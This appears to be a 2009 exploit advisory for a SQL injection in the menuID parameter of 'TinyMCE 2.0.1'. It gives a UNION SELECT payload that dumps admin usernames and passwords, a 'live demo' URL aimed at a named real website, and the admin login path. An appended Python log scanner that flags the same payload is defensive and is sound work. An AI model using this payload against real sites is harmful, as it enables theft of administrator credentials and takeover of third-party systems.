TinyMCE 2.0.1 (index.php menuID) Remote SQL Injection Vulnerability

2009.02.06
Credit: AnGeL25dZ
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

************************************************************
** TinyMCE Remote SQL Injection
************************************************************
** Product: TinyMCE Version 2.0.1
** Home : http://tinymce.moxiecode.com
** Vulnerability : 2/ SQL Injection
** Risk : high !!
** Dork : N/A
************************************************************
** Discovered by: AnGeL25dZ
** From : Constantine - Algeria
** Contact : angel25dz@gmail.com
**
*********************************************************
** Greetz to : ALLAH
** All Members of HackTeachTeam http://www.hackteach.org/
** Ra3ch, His0k4
************************************************************
** Remote SQL Injection vulnerability
**
** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
** Use : http://[path]/Exploit
** Admin : http://[path]/cms/login.php
****************************************************************
** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
****************************************************************
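A detection check for the request pattern in the advisory above, as an added example that is not part of the original advisory: it flags access-log requests to index.php whose decoded menuID is not a plain integer. The log format (Common/Combined), the assumption that menuID is always numeric in legitimate traffic, and all sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the server logs in Common/Combined Log Format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3})')
# Keywords from the advisory's payload; used only to grade the finding.
SQL_TOKENS = re.compile(r'\b(union|select|from|group_concat|char)\b', re.I)


def check_line(line, param="menuID"):
    """Return a finding for a non-integer menuID on index.php, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    try:
        parts = urlsplit(m.group("target"))
    except ValueError:
        return None
    # "/" is included because index.php is commonly the directory index.
    if not (parts.path.endswith("/index.php") or parts.path.endswith("/")):
        return None
    # parse_qs percent-decodes and maps "+" to a space, as PHP does for $_GET.
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumed legitimate shape: a bare menu id
        verdict = "sql-tokens" if SQL_TOKENS.search(value) else "non-integer"
        return {"ip": m.group("ip"), "status": int(m.group("status")),
                "value": value, "verdict": verdict}
    return None


def scan(lines):
    """Return the findings for every flagged line, in input order."""
    return [f for f in map(check_line, lines) if f]


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Feb/2009:10:01:22 +0100] "GET /index.php?menuID=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Feb/2009:10:02:41 +0100] "GET /index.php?menuID=-1%20union%20select%200,'
    'Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3%20from%20adminusers HTTP/1.1" 200 734',
    '203.0.113.9 - - [06/Feb/2009:10:03:02 +0100] "GET /?menuID=7%27 HTTP/1.1" 500 310',
    '198.51.100.4 - - [06/Feb/2009:10:04:10 +0100] "GET /cms/login.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```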



Copyright 2024, cxsecurity.com

 
